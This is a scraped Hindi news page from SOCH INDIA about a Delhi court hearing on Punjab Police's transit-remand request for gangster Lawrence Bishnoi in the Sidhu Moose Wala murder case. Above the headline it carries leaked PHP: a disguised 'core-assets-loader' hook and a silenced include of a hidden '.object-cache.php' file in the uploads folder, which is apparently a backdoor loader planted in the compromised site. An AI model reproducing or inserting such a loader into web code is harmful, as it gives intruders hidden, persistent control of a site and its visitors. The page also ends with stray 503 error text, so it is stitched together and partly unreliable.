add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Lawrence Bishnoi: लॉरेंस बिश्नोई को पंजाब पुलिस करेगी गिरफ्तार, दिल्ली कोर्ट ने दी इजाजत – SOCH INDIA
Menu

देश
Lawrence Bishnoi: लॉरेंस बिश्नोई को पंजाब पुलिस करेगी गिरफ्तार, दिल्ली कोर्ट ने दी इजाजत

nobanner

दिल्ली की अदालत ने पंजाब पुलिस को लॉरेंस बिश्नोई की गिरफ्तारी की इजाजत दे दी है. दिल्ली पुलिस (Delh Police) ने आज गैंगस्टर (Gangster) लॉरेंस बिश्नोई (Lawrence Bishnoi) को पटियाला हाउस कोर्ट (Patiala House Court) में पेश किया है. तो वहीं पंजाब पुलिस (Punjab Police) की ट्रांजिट रिमांड (Transits Remand) वाली याचिका पर कोर्ट में बहस पूरी हो गई है थोड़ी देर में कोर्ट फैसला सुना सकता है. उधर कोर्ट में दिल्ली पुलिस ने कहा है कि जिस मामले में हम पूछताछ कर रहे है उस मामले में हमे कुछ खास नहीं पता चला है इसलिए हमे कस्टडी (Custody) चाहिए. तो वहीं पंजाब पुलिस ने भी कोर्ट में बिश्नोई की रिमांड (Bishnoi Remand) की मांग की है. पंजाब पुलिस के एडवोकेट (Punjab Police Advocate) जनरल ने लॉरेंस बिश्नोई की ट्रांजिट रिमांड के लिए अर्जी दाखिल की पंजाब पुलिस ने सिद्धू मुसेवाला (Sidhu Moose Wala) हत्या का जिक्र किया.

पंजाब पुलिस ने सोशल मीडिया पर एक वीडियो का जिक्र करते हुए कहा कि इस वीडियो में एक मर्डर की जिम्मेदारी लॉरेंस बिश्नोई ने ली है. बिश्नोई ने सोशल मीडिया पर दावा किया था कि उसने हत्या की है. इस पर कोर्ट ने पूछा कि क्या उसने खुद स्वीकार किया है? इस पर वकील ने कहा कि उसने खुद कहा है की गोल्डी बरार के साथ मिल कर हत्या करवाई है.

पंजाब पुलिस ने भी की ट्रांजिट रिमांड की मांग

पंजाब पुलिस ने बिश्नोई, गोल्डी बरार को तमाम संगीन मामलों में शामिल बताते हुए ट्रांजिट रिमांड की मांग की है. 16 पुलिस कर्मियों की पंजाब पुलिस की टीम दिल्ली आई है, जिसमें सीनियर ऑफिसर भी शामिल हैं. पंजाब पुलिस के वकील ने कोर्ट में कहा कि लॉरेंस बिश्नोई ने ही हत्या करवाई है. वहीं दिल्ली पुलिस ने भी यही कहा है. जो भी लोग लॉरेंस और गोल्डी के करीबी है वो इसमें अलग-अलग लेवल पर शामिल हैं. ये ऑर्गनाइज और प्लांड मर्डर है. इस हत्या को विक्रमजीत सिंह की हत्या का बदला लेने के लिए किया गया है.

लॉरेंस बिश्नोई के वकील ने ट्रांजिट रिमांड का किया विरोध

वहीं बिश्नोई (Lawrence Bishnoi) के वकील विशाल चोपड़ा (Vishal Chopra) ने पंजाब पुलिस (Punjab Police) की मांग का विरोध किया, बिश्नोई को पंजाब में जान का खतरा (Death Threat) बताया. वकील ने कहा अगर लारेंस को पंजाब ले जाया गया तो उसका फेक एनकाउंटर (Fake Ancounter) भी हों सकता है. विशाल चोपड़ा ने कोर्ट में कहा कि दिल्ली की मकोका कोर्ट (Macoca Court) का ट्रायल पेंडिंग है, वहां भी जान का खतरा का अंदेशा जता चुके हैं. एडवोकेट चोपड़ा ने सुप्रीम कोर्ट (Supreme Court) के स्टे का हवाला दिया जो बिश्नोई को पंजाब ले जाने पर लगा है. इस पर पंजाब पुलिस (Punjab Police) के वकील ने कोर्ट में दलील देते हुए कहा की अगर कोर्ट लारेंस बिश्नोई की कस्टडी पंजाब पुलिस को दी जाती है तो पंजाब पुलिस सुरक्षा (Security) की पूरी जिम्मेदारी लेगी. जिसमे में पंजाब पुलिस के लगभग 50 पुलिस कर्मी, दो बुलेट प्रूफ गाड़ी (Bullet Proof Vehicle) होगी, 12 गाड़िया रास्ते में चलेगी जो रूट क्लियर करेगी. सभी रुट की विडीयोग्राफी (Videography) की जाएगी. पंजाब पुलिस ने कहा कि सुप्रीम कोर्ट के पूरे आदेश का पालन किया जायेगा.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.